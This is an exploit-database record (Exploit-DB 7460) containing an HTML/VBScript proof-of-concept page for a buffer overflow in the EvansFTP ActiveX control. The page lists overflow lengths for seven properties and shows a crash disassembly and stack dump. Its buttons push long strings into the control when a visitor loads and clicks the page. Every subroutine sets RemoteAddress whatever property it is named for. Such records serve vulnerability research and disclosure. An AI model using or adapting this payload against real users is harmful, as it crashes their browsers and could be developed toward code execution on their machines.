{"bulletinFamily": "exploit", "id": "EDB-ID:7460", "cvelist": [], "modified": "2008-12-14T00:00:00", "lastseen": "2016-02-01T02:16:42", "edition": 1, "sourceData": "<HTML>\n<package><job id='DoneInVBS' debug='false' error='true'>\n<object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' />\n<HEAD>\n <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE>\n</HEAD>\n<BODY>\n[+] Application : EvansFTP ActiveX <br>\n[+] CompanyName : Evans Programming <br>\n[+] Description : Multi-threaded asynchronus Active-X FTP Control<br>\n[+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br>\n[+] Exploit : Remote BoF (PoC)<br>\n[+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br>\n[+] Object Safety Report :<br>\nReport for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br>\nRegKey Safe for Script: Faux<br>\nRegKey Safe for Init: Faux<br>\nImplements IObjectSafety: Vrai<br>\nIDisp Safe: Safe for untrusted: caller,data <br>\nIPStorage Safe: Safe for untrusted: caller,data <br><br>\nRegKey Safe for Script: Faux<br>\nRegkeySafe for Init: Faux<br>\nKillBitSet: Faux<br>\n<br><br>\nThe Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br>\n1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br>\n2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br>\n3- ProxyName suffers from a BoF when we pass a string over 1044 <br>\n4- Password suffers from a BoF when we pass a string over 1044 <br>\n5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br>\n6- LoginName suffers from a BoF when we pass a string over 1044 <br>\n7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br>\nDisASM RemoteAddress Crash :<br><pre>\n7C809EEC MOV AL,[EDX] (KERNEL32.dll)\n \n7C809ED4 TEST EDX,EDX\n7C809ED6 JE 7C80C858\n7C809EDC LEA EDI,[EDX+EAX-1]\n7C809EE0 CMP EDI,EDX\n7C809EE2 JB 7C80C858\n7C809EE8 AND DWORD PTR [EBP-4],0\n7C809EEC MOV AL,[EDX] <--- CRASH\n \nEBP+8 FEEEFEEE\nStack Dump:\n13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00\n \n</pre>\n<script language='vbscript'>\nSub RemoteAddress\narg1=String(2068, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n \nSub ProxyPrefix\narg1=String(1044, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n \nSub ProxyName\narg1=String(1044, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n \nSub Password\narg1=String(1044, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n \nSub ProxyBypassList\narg1=String(1044, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n \nSub LoginName\narg1=String(1044, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n \nSub CurrentDirectory\narg1=String(1044, \"A\")\nbeard.RemoteAddress = arg1\nEnd Sub\n</script><br><br>\n \n<INPUT TYPE=\"button\" VALUE=\"RemoteAddress PoC\" ONCLICK=RemoteAddress()>\n<INPUT TYPE=\"button\" VALUE=\"ProxyPrefix PoC\" ONCLICK=ProxyPrefix()>\n<INPUT TYPE=\"button\" VALUE=\"ProxyName PoC\" ONCLICK=ProxyName()>\n<INPUT TYPE=\"button\" VALUE=\"Password PoC\" ONCLICK=Password()>\n<INPUT TYPE=\"button\" VALUE=\"ProxyBypassList PoC\" ONCLICK=ProxyBypassList()>\n<INPUT TYPE=\"button\" VALUE=\"LoginName PoC\" ONCLICK=LoginName()>\n<INPUT TYPE=\"button\" VALUE=\"CurrentDirectory PoC\" ONCLICK=CurrentDirectory()><br><br>\nBrought to You by Bl@ckbe@rD<br>\nPeace xD\n </BODY>\n</HTML>\n\n# milw0rm.com [2008-12-14]\n", "published": "2008-12-14T00:00:00", "href": "https://www.exploit-db.com/exploits/7460/", "osvdbidlist": ["57365"], "reporter": "Bl@ckbe@rD", "hash": "3057fb8021d5f2bfeee311f93825ae7f0246ffa8f5bd549ba67a894ae34ee191", "title": "EvansFTP EvansFTP.ocx Remote Buffer Overflow PoC", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC. Dos exploit for windows platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/7460/", "enchantments": {"vulnersScore": 2.8}}

{"result": {}}